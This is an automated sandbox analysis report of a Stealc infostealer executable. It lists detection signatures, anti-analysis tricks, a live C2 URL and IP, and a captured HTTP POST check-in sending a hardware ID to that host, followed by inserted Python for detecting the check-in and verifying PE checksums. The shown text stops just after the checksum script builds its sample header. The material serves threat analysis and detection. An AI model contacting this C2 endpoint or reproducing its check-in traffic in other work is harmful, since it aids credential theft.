
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1538461
MD5: 6535a50286893f791f119217511acc32
SHA1: 2155f365670366e0839d7231944930ddf60ea32b
SHA256: 42944bc940b4e9c0dd2a3f97ab9090005213870edeb8e26fec953afa12140ef2
Tags: exe, user-Bitsight

Detection

Detected family: Stealc
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 616 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6535A50286893F791F119217511ACC32)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development draws on other prominent stealers: Vidar, Raccoon, Mars and RedLine. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency-wallet applications, as well as other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2023298984.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 616 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 616 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.5f0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
                No Sigma rule has matched
Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-10-21T10:46:59.150628+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.5f0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/f | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php& | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.php/ | Virustotal: Detection: 17%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00608EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00604910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00604570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00603EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FF68A FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005FF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 44 38 42 37 41 45 33 39 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4b 45 43 41 41 41 46 48 4a 45 43 41 41 41 45 42 46 2d 2d 0d 0a
    Data Ascii:
        ------GHJKECAAAFHJECAAAEBF
        Content-Disposition: form-data; name="hwid"

        32D8B7AE39294266498721
        ------GHJKECAAAFHJECAAAEBF
        Content-Disposition: form-data; name="build"

        doma
        ------GHJKECAAAFHJECAAAEBF--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (repeated 7 times in the report)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same headers and 211-byte multipart body as the global-traffic entry above)
Source: file.exe, 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2067248972.000000000141B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ctionSettingsa
Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&
Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php/
Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
Source: file.exe, 00000000.00000002.2067248972.0000000001463000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
Source: file.exe, 00000000.00000002.2067248972.0000000001446000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
Source: file.exe, 00000000.00000002.2067248972.000000000141B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/f
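The check-in captured above is small enough to parse by hand, which is useful when writing or validating a detection for it. The following is an added example, not code from the report, from Joe Sandbox, or from the Stealc family itself. The request bytes are rebuilt from the "Data Ascii" shown in the capture (constructed input, byte-for-byte the same 211-byte body). The classification rule it applies (a POST carrying a multipart/form-data body with no User-Agent header and exactly the form fields "hwid" and "build") is an assumption drawn from this single capture; it is not the logic of Emerging Threats SID 2044243, and it will not match the later per-file exfiltration POSTs the Malpedia description mentions, which carry different fields.

```python
import re

# Check-in request rebuilt from the report's "Data Ascii" (constructed input).
# The body delimiter is "--" + the boundary declared in Content-Type.
SAMPLE_REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------GHJKECAAAFHJECAAAEBF\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"32D8B7AE39294266498721\r\n"
    b"------GHJKECAAAFHJECAAAEBF\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------GHJKECAAAFHJECAAAEBF--\r\n"
)


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: no end of headers")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(content_type, body):
    """Return {field name: raw value} for a multipart/form-data body.
    Only the 'name' parameter is extracted; file parts would also need
    filename and the part's own Content-Type."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no boundary in Content-Type")
    delimiter = b"--" + m.group(1).encode("ascii")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        if part.startswith(b"\r\n"):
            part = part[2:]
        head, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', head)
        if name is None:
            continue
        if value.endswith(b"\r\n"):         # CRLF that precedes the next delimiter
            value = value[:-2]
        fields[name.group(1).decode("ascii")] = value
    return fields


def classify_checkin(raw):
    """Assumed heuristic for the check-in seen in this capture: POST, multipart
    body, no User-Agent, exactly the fields 'hwid' and 'build'. Returns the
    extracted values, or None when the request does not match."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or "user-agent" in headers:
        return None
    declared = headers.get("content-length")
    if declared is not None and int(declared) != len(body):
        return None                         # truncated or padded body: do not trust it
    ctype = headers.get("content-type", "")
    if not ctype.lower().startswith("multipart/form-data"):
        return None
    fields = parse_multipart(ctype, body)
    if set(fields) != {"hwid", "build"}:
        return None
    return {
        "path": path,
        "host": headers.get("host"),
        "hwid": fields["hwid"].decode("ascii", "replace"),
        "build": fields["build"].decode("ascii", "replace"),
    }


if __name__ == "__main__":
    print(classify_checkin(SAMPLE_REQUEST))
```

The Content-Length check matters in practice: a PCAP reassembled from a partial stream can hand you a body shorter than declared, and a rule that keys on field names alone would still fire on it. The "build" value ("doma") is the same string the configuration extractor reports as "Botnet", so the two indicators can be cross-checked against each other.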

                System Summary

Source: file.exe | Static PE information: section name: (blank as rendered)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank as rendered)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00881836
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CE1B7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B81B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BB91A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C5AAB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CAAC7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008AFAEB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00986AE2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009BD37C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C2B65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00897C2C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009835B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0092A5D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009C95C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B9D29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B66B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B560C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088662B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A2F8A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00990F9E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0094A785
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008F1F0B
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005F45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: yuntpzro ZLIB complexity 0.9950741505841467
Source: file.exe, 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2023298984.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00603720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\G0YGKKW1.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1887232 > 1048576
Source: file.exe | Static PE information: Raw size of yuntpzro is bigger than: 0x100000 < 0x1a6a00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.5f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;yuntpzro:EW;dfroebje:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;yuntpzro:EW;dfroebje:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00609860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cf6b3 should be: 0x1d59e5
Source: file.exe | Static PE information: section name: (blank as rendered)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank as rendered)
Source: file.exe | Static PE information: section name: yuntpzro
Source: file.exe | Static PE information: section name: dfroebje
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD80AD push esi; mov dword ptr [esp], ebx (at 0_2_00AD895E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A6A0B6 push ebp; mov dword ptr [esp], esp (at 0_2_00A6A0E5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A8D0B4 push esi; mov dword ptr [esp], ebp (at 0_2_00A8D0C4)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A8D0B4 push ecx; mov dword ptr [esp], eax (at 0_2_00A8D114)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009D28BF push 36DCB21Fh; mov dword ptr [esp], esi (at 0_2_009D2900)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0060B035 push ecx; ret (at 0_2_0060B048)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA80D5 push 4AAD475Eh; mov dword ptr [esp], edx (at 0_2_00AA80DD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3F82D push esi; mov dword ptr [esp], 75B8F8B0h (at 0_2_00A3F8BE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00881836 push edx; mov dword ptr [esp], esi (at 0_2_00881862)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00881836 push 74352565h; mov dword ptr [esp], eax (at 0_2_0088189D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00881836 push eax; mov dword ptr [esp], 005B3318h (at 0_2_008818DA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00881836 push 657822B6h; mov dword ptr [esp], ebx (at 0_2_008818FB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00881836 push 1B19F53Dh; mov dword ptr [esp], ebp (at 0_2_00881903)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00881836 push 66B9D204h; mov dword ptr [esp], edi (at 0_2_00881940)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00881836 push ecx; mov dword ptr [esp], 283310FEh (at 0_2_00881995)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE8866 push 11604F82h; mov dword ptr [esp], edx (at 0_2_00AE88BC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A48840 push edi; mov dword ptr [esp], edx (at 0_2_00A48844)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3B84F push 040D9C91h; mov dword ptr [esp], edi (at 0_2_00A3B86F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3B84F push 120D10D0h; mov dword ptr [esp], ebx (at 0_2_00A3B892)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A6E851 push 71497BEAh; mov dword ptr [esp], edx (at 0_2_00A6E874)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A6E851 push ebp; mov dword ptr [esp], ebx (at 0_2_00A6E8DC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959069 push edi; mov dword ptr [esp], 76488C02h (at 0_2_009590F8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00959069 push 596F0992h; mov dword ptr [esp], esi (at 0_2_0095910A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A7A9BB push ebx; mov dword ptr [esp], eax (at 0_2_00A7AA05)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CE1B7 push 6FDFE1A9h; mov dword ptr [esp], edx (at 0_2_009CE1F0)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CE1B7 push edi; mov dword ptr [esp], 7EF82E3Ch (at 0_2_009CE24C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CE1B7 push 39D51FCCh; mov dword ptr [esp], edx (at 0_2_009CE2D1)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CE1B7 push 77151DC5h; mov dword ptr [esp], edx (at 0_2_009CE2E5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CE1B7 push ebx; mov dword ptr [esp], esi (at 0_2_009CE2FB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CE1B7 push 5D3AB117h; mov dword ptr [esp], eax (at 0_2_009CE408)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CE1B7 push eax; mov dword ptr [esp], esi (at 0_2_009CE42D)
Source: file.exe | Static PE information: section name: yuntpzro entropy: 7.954094538527286
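The "real checksum ... should be" finding above comes from recomputing the PE header checksum and comparing it with the stored OptionalHeader.CheckSum. A mismatch on its own is weak evidence (many legitimate non-driver binaries are never checksummed, and the field is then 0), but a non-zero stored value that does not verify, as here, is a reliable sign that the file was rewritten after it was built, which fits the packer-added sections listed above. The following is an added example, not code from the report or from Joe Sandbox, implementing the same checksum algorithm that CheckSumMappedFile uses (32-bit words summed with end-around carry, the CheckSum field itself skipped, folded to 16 bits, plus the file length). The minimal PE32 header it builds for the demonstration is constructed input, not the sample from this report; the sample itself is not on this page, so the report's own numbers cannot be reproduced here.

```python
import struct


def pe_checksum_offset(data):
    """File offset of OptionalHeader.CheckSum: e_lfanew (at 0x3C) -> "PE\\0\\0"
    (4 bytes) -> IMAGE_FILE_HEADER (20 bytes) -> optional header, where
    CheckSum sits at +0x40 for both PE32 and PE32+."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20 + 0x40


def pe_checksum(data, checksum_offset):
    """Recompute the PE checksum over the whole file image.
    The dword holding the stored CheckSum is skipped so the result does not
    depend on the value currently in the field."""
    skip = checksum_offset & ~3
    padded = data + b"\0" * (-len(data) % 4)       # pad to a dword boundary
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)   # end-around carry
    total = (total & 0xFFFF) + (total >> 16)           # fold to 16 bits
    total = total + (total >> 16)
    return (total & 0xFFFF) + len(data)                # plus the real file length


def verify_pe_checksum(data):
    """Return (stored, computed); the file is consistent when they are equal."""
    off = pe_checksum_offset(data)
    stored = struct.unpack_from("<I", data, off)[0]
    return stored, pe_checksum(data, off)


def patch_checksum(data):
    """Write the correct checksum into a copy of the image (what a linker does)."""
    off = pe_checksum_offset(data)
    buf = bytearray(data)
    struct.pack_into("<I", buf, off, pe_checksum(data, off))
    return bytes(buf)


def build_fake_pe():
    """Constructed minimal PE32 header skeleton (assumed layout, not the
    report's sample): MZ stub, e_lfanew = 0x40, PE signature, file header with
    SizeOfOptionalHeader = 0xE0, and an optional header whose Magic is PE32.
    Everything else, including CheckSum, is left zero."""
    e_lfanew = 0x40
    size_opt = 0xE0
    buf = bytearray(e_lfanew + 4 + 20 + size_opt)  # 0x138 bytes in total
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", buf, e_lfanew + 4 + 16, size_opt)  # SizeOfOptionalHeader
    struct.pack_into("<H", buf, e_lfanew + 4 + 20, 0x10B)     # Magic = PE32
    return bytes(buf)


if __name__ == "__main__":
    image = build_fake_pe()
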